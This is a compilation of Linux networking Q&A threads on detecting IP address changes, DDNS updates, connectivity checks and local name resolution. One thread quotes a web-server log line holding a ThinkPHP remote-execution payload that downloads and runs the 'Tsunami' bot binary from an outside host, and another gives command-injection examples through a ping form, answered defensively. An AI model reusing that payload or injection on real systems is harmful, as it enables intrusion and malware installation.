Does anyone know a way to detect a change of IP address in Linux? Say I have dhcpcd running, and it assigns a new IP address, is there a way I can get a notification when it changes? I can't use D-Bus, because this is an embedded ucLinux build that doesn't have it.
inotify on something in /proc/net/ ?
This is an old question, but I will answer for those who will arrive by Google (such as myself). After struggling for a while, I found out that you don't necessarily need to poll or hack a C solution for this. For my case, I wanted to update my home server's (dynamic dns) domain when the IP changes.
If you are running dhcpcd, you are in luck. dhcpcd will run hook scripts when anything happens. See man dhcpcd-run-hooks (online here). Basically you will want to modify or create your own dhcpcd.enter-hook or dhcpcd.exit-hook depending on what you want to do with the data provided by the event.
The command
ip monitor
will show you this kind of thing happening. It uses some of the netlink API, which is rather tricky and not documented well (at least for humans to understand). However, it is able to get notified by the kernel of various events, such as changes of assigned IPs, routing tables and link status (e.g. someone unplugged the network).
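As an added example (not part of the answer above), the function below turns the one-line-per-event output of ip -o monitor address into add/delete notifications. The sample lines are constructed with documentation addresses, and the line layout is assumed from iproute2's usual output.

```sh
#!/bin/sh
# Added example: parse `ip -o monitor address` events.
# Assumed line shapes (with -o, one event per line):
#   2: eth0    inet 192.0.2.10/24 brd ... scope global dynamic eth0\ valid_lft ...
#   Deleted 2: eth0    inet 192.0.2.10/24 brd ...

# parse_addr_events: read monitor lines on stdin, print "<add|del> <iface> <addr>"
parse_addr_events() {
    while read -r a b c d e _rest; do
        action=add
        if [ "$a" = "Deleted" ]; then
            # removal lines carry one extra leading word; shift fields left
            action=del; b=$c; c=$d; d=$e
        fi
        # now: b = interface, c = address family, d = address/prefix
        case "$c" in
            inet|inet6) ;;
            *) continue ;;              # not an address event
        esac
        if [ "$b" = "lo" ]; then continue; fi   # loopback is not interesting
        printf '%s %s %s\n' "$action" "$b" "${d%%/*}"
    done
}

# Constructed sample lines (documentation addresses), not captured output.
sample_events() {
    printf '%s\n' \
      '2: eth0    inet 192.0.2.10/24 brd 192.0.2.255 scope global dynamic eth0\       valid_lft 86400sec preferred_lft 86400sec' \
      'Deleted 2: eth0    inet 192.0.2.10/24 brd 192.0.2.255 scope global dynamic eth0\       valid_lft 86400sec preferred_lft 86400sec' \
      '1: lo    inet 127.0.0.1/8 scope host lo\       valid_lft forever preferred_lft forever' \
      '2: eth0    inet 198.51.100.7/24 brd 198.51.100.255 scope global dynamic eth0\       valid_lft 3600sec preferred_lft 3600sec'
}

if [ "${1:-}" = "--watch" ]; then
    ip -o monitor address | parse_addr_events   # live: blocks until killed
else
    sample_events | parse_addr_events           # offline demo on the sample
fi
```

Run with --watch on the target to see live events; pipe the output into whatever notification command the system has.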
Since DHCP activity is sent to syslogd you could create a named pipe, direct syslog traffic to it and watch the stream for IP address updates. See 'man syslogd' and 'man syslog.conf'.
Edit: Another approach would be to use inotify to monitor the DHCP leases file for the interface. Under Ubuntu 9.10 that is in the /var/lib/dhcp3 directory.
What I thought of was running this script from cron every 10 or so minutes, depending on your link.
If I wrote this right, it only nsupdates when there is an IP change, so no undue load is created on the zone's master server.
#!/bin/bash
OLD_IP=$(cat ip.txt)
# adapted from something I got from the internets.
# Matches the classic ifconfig "inet addr:a.b.c.d" lines; field 4 is the address.
NEW_IP=$(/sbin/ifconfig | awk -F "[: ]+" '/inet addr:/ { print $4 }')
if [ "$NEW_IP" != "$OLD_IP" ]; then
    nsupdate <commands> #it seems like the keys need to be in the same directory from where nsupdate was called
fi
echo "$NEW_IP" > ip.txt
exit 0 #not sure if this is necessary
Not tested!
This is an older thread but in case someone finds it like I did, I wrote something that does network change detection/notification in Linux awhile back (mostly targeted at helping VPN users), and thanks to some pushy friends I put it up for others to use. It's a pet project now and I'm actively maintaining it, so feature requests and feedback are welcome.
http://code.google.com/p/ipcheck/source/browse/ipcheck.sh
I think you can use dbus to do this on modern Linux distributions. If your distribution uses NetworkManager, see this document for information about its dbus interface:
http://people.redhat.com/dcbw/NetworkManager/NetworkManager%20DBUS%20API.txt
If you have a router running DD-WRT and have the status page in use when going to the router, you can, with a script, wget the status page, cat for the IP address and write it to a file for comparison, and have an email sent when the latest wget IP address has changed from what is in the comparison file.
I'm running dd-wrt on a linksys wrt54g router and use this script:
It wgets the router status page from 192.168.3.1, uses cat on the page (index.html) and greps for the wan ip address, then writes it to a file (gotip.txt).
A comparison is made between the captured ip (gotip.txt) and the current working ip (workingip.txt). If the ip addresses are different, I get an email sent by send mail of the new ip, and the new working ip is written into the workingip.txt file.
Cron runs this every 5 min or so and I have the cron output silenced to /dev/null.
#!/bin/bash
# Fetch the router status page; wget saves it as index.html
getip=$(wget http://192.168.3.1/)
cat index.html | grep "wan_ipaddr" > gotip.txt
gotip=$(cat gotip.txt)
compare=$(cat workingip.txt)
if [[ "$compare" != "$gotip" ]]
then
    EMAIL="youremail#foo.net"
    EMAILMESSAGE="/home/pi/ipmessage.txt"
    echo "ip address is now $gotip" >> "$EMAILMESSAGE"
    /usr/sbin/sendmail -t "$EMAIL" < "$EMAILMESSAGE"
    # remove the message file by its full path, wherever cron starts the script
    rm "$EMAILMESSAGE"
    cp gotip.txt workingip.txt
    rm index.html
else
    echo "done"
    rm index.html
fi
Several minutes ago, I ran a python-based server to share a few files with my friend. I disabled the windows firewall so that he could connect and download the files. When someone tries to connect the server, Python shows their IP address and the path they requested.
Someone whom I don't know tried to get my index.php and run wget. I checked their IP address and it seems like they're from Japan. So, how did this person know my IP address and try to connect to my computer? I've only shared it with my friend on WhatsApp.
I've done this many times before and this is the first time something like this happens.
61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -
There are many people out there running tools like Masscan with custom scripts looking for vulnerable web servers. Most of the time these scripts are trying to get reverse shells in an attempt to build botnet armies. There are also some reports of Windows machines connected to the internet being hacked before the OS finishes its installation.
This is a pretty common hacking technique. Hackers will scan the internet using seemingly random ip addresses (and happened to pick yours out) and look for open ports (usually common ports like 22, 80 and 443) and run a bunch of common exploits in efforts to gain control over the machine.
Many of the botnets were created by just attacking random IP addresses, hoping that they would have a router with the default username and password still set, or with out-of-date software with known exploits.
In your case it looks like they were hoping that your web server was running a certain combination of PHP software. Your ip address was probably one of thousands that they ran the same query against.
This is why you shouldn't disable your firewall: the average time it takes from going online without protection to someone trying to crack into your system is at best minutes.
Instead, you should find out the IP of your friend, and just allow that single IP. And unless your friend has a static IP address, remove that allow after they're done testing, because someone else could get that address later.
Scenario is this.
I have logged into a web server as admin through the login page in browser.
It has presented me with an input box with a button next to it saying "ping".
It essentially will ping an IP address that you input.
I know for a fact the service running on the web server is running as root.
My question is this: can I put in an IP address and then pipe a command after it to elevate my privileges?
For Example...
ping 192.168.0.1 | usermod -a -G <groupname> username
ping 192.168.0.1 | whoami
The command shell running the ping is running under root, so in theory it should allow me to elevate a user's privileges on the system? Please correct me if I'm wrong.
Don't have anything to test on, hence the question.
Thanks in advance.
This question cannot be answered with a certain "yes" or "no" without seeing the code or being able to explore the system.
It all really depends on the web app. If they're simply concatenating your input onto the end of ping and then execing that command, then yes, what you show is possible.
On the other hand, if they're properly sanitizing inputs (e.g. ensuring the input is only an IP address), or using some other implementation (e.g. a Ping library), then it may not be vulnerable.
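To make the two cases in this answer concrete, here is an added example (not code from the application in question, which is not shown on the page): the concatenating handler next to a form that only accepts a strict dotted-quad IPv4 address and passes it as a single argument. The function names are hypothetical.

```sh
#!/bin/sh
# Added example: handling the "ping" form field (function names are hypothetical).

# Vulnerable pattern: the field is pasted into a string that a shell parses,
# so "192.168.0.1 | whoami" becomes two commands. Shown for contrast only.
ping_unsafe() {
    sh -c "ping -c 1 $1"
}

# is_ipv4: succeed only for a strict dotted quad (no spaces, no metacharacters)
is_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.) return 1 ;;   # digits and dots only, no edge dots
    esac
    old_ifs=$IFS; IFS=.
    set -- $1                             # split on dots into $1..$n
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        case "$octet" in
            ''|????*|0?*) return 1 ;;     # empty, too long, or leading zero
        esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Hardened form: validate first, then pass the value as a single argument.
ping_safe() {
    if ! is_ipv4 "$1"; then
        echo "rejected: not an IPv4 address" >&2
        return 2
    fi
    ping -c 1 "$1"
}

# Offline demo on constructed inputs; only the validator runs, nothing is pinged.
for input in '192.168.0.1' '192.168.0.1 | whoami' '192.168.0.1.' '010.0.0.1'; do
    if is_ipv4 "$input"; then verdict=accept; else verdict=reject; fi
    printf '%-24s %s\n' "$input" "$verdict"
done
```

Running the ping service as an unprivileged user instead of root limits the damage if a validation gap is ever found.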
In Linux (Ubuntu), I want to programmatically check if there is Internet connection (or if eth0 is connected).
I'm doing this because I am writing a program that requires network connection on a system that is highly prone to lose connection.
So I was thinking maybe a script that I can run periodically to check.
Can you give me good suggestions?
Here is a quick script that will accomplish what you want:
EMAIL=youremail#something.com
ping -c 5 8.8.8.8 >> /dev/null
if [ $? -eq 0 ]
then
echo "Able to reach internet!" | mail $EMAIL
else
echo "Unable to reach internet!" | mail $EMAIL
fi
Obviously you can change the mail to something else to do depending on what your goal is.
EDIT: to explain, this pings Google's DNS server to ensure you are connected and sends you an email one way or the other. The email part on failure will only work of course if you have a local email server on your network.
/sbin/ifconfig would be an excellent "get adapter status" command to script.
cron would be an excellent way to execute the script.
I also suggest to ping or perhaps wget some distant server (preferably the one you want to connect to). The network could work well on the local campus, but not well on intercontinental connections (e.g. because some cables have been cut).
Is there a way to programmatically add hosts to the local name resolver under Linux?
I would rather avoid fiddling with /etc/hosts dynamically...
Example: add the name foo and bind it to the local port 127.1.2.3
Use Case: I have an application installed locally accessible through a web browser. I'd like the application to be accessible through a local URI.
add the name foo and bind it to the local port 127.0.0.1:9999
What is it that you want? You can add foo 127.0.0.1 to hosts or do the equivalent in your nameserver, but a connection to foo on port 1234 will always go to 127.0.0.1:1234 -- it's not possible to redirect that to port 9999 based on name, which is lost by the time connect is called.
On Linux you can add IPs to the loopback device (i.e. ip addr add 127.1.2.3 dev lo), and then use iptables to change all connections destined for 127.1.2.3:1234 to instead go to 127.0.0.1:9999, but I can't tell from your question if that is the observable behavior you want.
If you'll only add hosts, a pretty safe way to do it is
echo -e "ip.add.re.ss\thostname" >> /etc/hosts
Now, if you want to remove them it starts getting hairy. I suspect you also want to remove them.
If this is the case you can use Dynamic DNS, for example, BIND has the nsupdate tool to update zone files:
$ nsupdate
> update delete oldhost.example.com A
> update add newhost.example.com 86400 A 172.16.1.1
> send
This does the following:
Any A records for oldhost.example.com are deleted. And an A record for newhost.example.com with IP address 172.16.1.1 is added. The newly-added record has a 1 day TTL (86400 seconds).
The Google search term you want is "DDNS" for "Dynamic DNS". That's a technology for dynamically adding records to DNS servers, which sounds like exactly what you want. I'm pretty sure the bind in most Linux distros supports it, but you may need to read up on how to configure it.
I'll be going with a recent discovery: multicast-dns using the Avahi package. An example can be found here.
I have a script which contacts a few sources and tell them "the IP-address XXX.XXX.XXX.XXX is my current one". My test web server has a dynamic IP-address through DHCP and amongst other things it needs to update a DDNS entry when its IP-address changes. However it's not the only thing it does, so I will need to run my own custom script.
I suspect that this is possible by attaching the script to be run for a given dhclient hook. However I still need to know which hook I should use, and how.
I would recommend to put the script into dhclient-exit-hooks.d. Because you should just change the DDNS entry, if the address change has been finished. However, I am not sure if dhclient-exit-hooks are called, if assigning an address fails.
Edit: The man page (man dhclient-script) says that the exit-hooks script will get the exit code in a shell variable (exit_status). So you could check it.
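An added example (not from any of the posts) of a hook fragment that fits both the dhclient-exit-hooks.d approach described here and the dhcpcd exit hook mentioned at the top of the page. It assumes the client exports reason, interface, new_ip_address and old_ip_address, treats a missing exit_status as success, and uses a hypothetical updater path in UPDATE_CMD.

```sh
# Added example; the DHCP client's hook runner sources this file, so it has
# no shebang. reason, interface, new_ip_address and old_ip_address are set by
# the client; exit_status is dhclient-only and defaults to 0 here.

# should_notify: succeed only when a lease event left us with a different address
should_notify() {
    [ "${exit_status:-0}" -eq 0 ] || return 1     # address setup failed
    case "${reason:-}" in
        BOUND|RENEW|REBIND|REBOOT) ;;             # events that carry a lease
        *) return 1 ;;
    esac
    [ -n "${new_ip_address:-}" ] || return 1      # nothing assigned
    [ "$new_ip_address" != "${old_ip_address:-}" ]
}

# Hypothetical path to your own updater script (DDNS and anything else).
UPDATE_CMD=${UPDATE_CMD:-/usr/local/sbin/update-my-ip}

if should_notify; then
    logger -t ip-change "${interface:-?}: ${old_ip_address:-none} -> $new_ip_address"
    if [ -x "$UPDATE_CMD" ]; then
        "$UPDATE_CMD" "$interface" "$new_ip_address"
    fi
fi
```

A plain renewal that keeps the same address sets old and new to the same value, so the updater is not called and the DNS master sees no extra traffic.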